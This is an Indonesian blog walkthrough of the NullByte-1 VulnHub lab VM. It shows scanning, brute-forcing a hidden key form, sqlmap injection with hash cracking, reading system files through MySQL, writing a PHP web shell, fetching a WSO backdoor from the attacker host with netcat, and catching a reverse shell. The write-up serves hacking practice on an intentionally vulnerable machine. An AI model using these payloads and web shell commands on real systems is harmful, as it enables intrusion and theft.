[Pentest Series] NullByte-1 Part-1

Hi semua

Kali ini saya masih menggunakan VM dari vulnhub yaitu NullByte. Silahkan download disini: https://www.vulnhub.com/entry/nullbyte-1,126/

Kalau saya nilai, sebenernya si challenge ini ga sulit2 amat. Cuman butuh banyak bruteforce sehingga mostly waktu terbuang disitu sih.

[!] VM Level: Medium

Set jaringan dan rock

Saya anggap kalian udah ngerti lah ya setup jaringan. Lakukan nmap dan kamu dapat port list seperti ini

Nmap scan report for 192.168.100.5
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
MAC Address: 08:00:27:86:83:73 (Oracle VirtualBox virtual NIC)

Pada fase ini, kamu boleh lakukan deep scanning dengan -p- (artinya port scan 1–65535) dan/atau -A -sV untuk mencari vulnerability terhadap service yang bersangkutan

Kalau saya langsung buka laman httpnya

Lakukan scanning directory terhadap web

Biasa, menggunakan dirb dengan standar common_web.txt. Semua wordlist saya ambil dari kali linux

---- Scanning URL: http://192.168.100.5/ ----
+ http://192.168.100.5/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.100.5/javascript/
==> DIRECTORY: http://192.168.100.5/phpmyadmin/
+ http://192.168.100.5/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.100.5/uploads/

Eh ternyata ada phpmyadmin. Tapi berhubung ga ada username/passnya yaudah skip dulu saja

Security by Obscurity

Saya sudah mencoba scan segala cara dan tidak membuahkan hasil. Disini

$ exiftool main.gif
ExifTool Version Number : 10.10
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2017:02:14 21:44:22+07:00
File Access Date/Time : 2017:02:14 21:44:24+07:00
File Inode Change Date/Time : 2017:02:14 21:44:22+07:00
File Permissions : rw-rw-r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071

Saya iseng liat exifnya dan ada komentar aneh. Hmm mungkin itu direktori web? Setelah saya selidiki, muncullah form aneh seperti ini

Dan sourcenya seperti ini

<center><font color='red'>invalid key</font></center><br>
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>

Ketika mau iseng cari ada file lain yang merupakan petunjuk

---- Scanning URL: http://192.168.100.5/kzMb5nVYJw/ ----
+ http://192.168.100.5/kzMb5nVYJw/index.php (CODE:200|SIZE:187)

Oke, mau tidak mau saatnya kita bruteforce. Buka burp dan siapkan payload password guessing (cari rockyou). Kita akan melakukan bruteforce laman ini dengan burp intruder

Setelah penantian panjang…..

Ada payload key yang berbeda dengan biasanya. Mungkin itu yang terjadi kalau berhasil login, yuk mari kita coba

Kalau kamu masukkan query, nanti akan muncul request seperti ini:

http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a

Yuk coba kita scan pake burp, mudah2an ada bug disini

Confirmed

Exploiting Bug

Sekarang gunakan SQLMap untuk melakukan eksploitasi

sqlmap.py -u "http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a" -p usrtosearch --dbs --is-dba --users --passwords
[22:22:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[22:22:42] [INFO] testing if current user is DBA
[22:22:42] [INFO] fetching current user
current user is DBA: True
[22:22:42] [INFO] fetching database users
database management system users [6]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'nullbyte'
[22:22:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:22:44] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/kucing/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:22:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:22:45] [INFO] starting dictionary-based cracking (mysql_passwd)
[22:22:45] [INFO] starting 4 processes
[22:22:53] [INFO] cracked password 'sunnyvale' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
[*] phpmyadmin [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[*] root [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[22:22:54] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
[22:22:54] [INFO] fetched data logged to text files under '/home/kucing/.sqlmap/output/192.168.100.5'
[*] shutting down at 22:22:54

Sekarang login menggunakan root:sunnyvale

Lalu lakukan querying SQL untuk buka /etc/passwd

select CAST(load_file('/etc/passwd') AS CHAR(100000000) CHARACTER SET utf8)
HASIL
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash

Inspeksi direktori web

Sekarang coba kita bruteforce halaman konfigurasi apache. Silahkan lihat writeup saya sebelumnya mengenai lokasi kemungkinan konfigurasi

select CAST(load_file('/etc/apache2/sites-enabled/000-default.conf') AS CHAR(10000000) CHARACTER SET utf8)
HASIL
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

Tadi kalau kamu lihat atasnya, terdapat folder “uploads”.
Ya mengapa tidak kita coba? :3

select CAST(load_file('/var/www/html/uploads/index.html') AS CHAR(10000000) CHARACTER SET utf8)
HASIL
<html>
<head><title>Uploads dir</title></head>
<body>
<p>Directory listing not allowed here.</p>
</body>
</html>

Menulis web shell ke dalam direktori

Sekarang saatnya mencoba menulis file ke dalam direktori uploads tersebut. Dengan perintah SQL seperti ini

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/uploads/shell.php'
MySQL returned an empty result set (i.e. zero rows). (Query took 0.0003 seconds.)

Lalu coba akses dengan curl seperti ini

$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=id%20;%20pwd"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/uploads

Pastikan netcat tersedia untuk transfer file backdoor shell sebenarnya

$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=which%20nc"
/bin/nc
%20 adalah pengganti spasi. Kalau kamu pake spasi ga akan bisa jalan. Kalau di browser bisa otomatis karena sudah menjadi fitur dasar untuk mengganti spasi menjadi %20

Memasukkan file backdoor WSO

Gunakan teknologi netcat untuk melakukan transfer file

$ nc -lvp 8080 < wso2.5.1.php 
Listening on [0.0.0.0] (family 0, port 8080)

Dan URL yang kamu akses akan menjadi seperti ini

http://192.168.100.5/uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php

Dan ini dia web backdoor yg saya maksud

Taking www-data shell

Kalau kamu membaca artikel pentest series sebelumnya. Kamu harusnya udah bisa lah ya, jadi ga perlu saya jelaskan lagi xD

$ nc -lvp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from [192.168.100.5] port 31337 [tcp/*] accepted (family 2, sport 37232)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@NullByte:/var/www/html/uploads$ ppwwdd
/var/www/html/uploads
www-data@NullByte:/var/www/html/uploads$ llss
file.txt  index.html  shell.php  wso.php
www-data@NullByte:/var/www/html/uploads$ iidd
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ya benar, shellnya rada jelek

Epilogue

Singkat kata, ini VM sepertinya cukup mudah. Tapi cukup menarik untuk dibahas, so stay tuned ya untuk artikel selanjutnya :)

Jangan lupa share artikel ini ke teman kamu yang sedang belajar hacking juga

Habibie Faried
habibiefaried@gmail.com
@habibiefaried
CISSP & OSC* Wanna Be

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.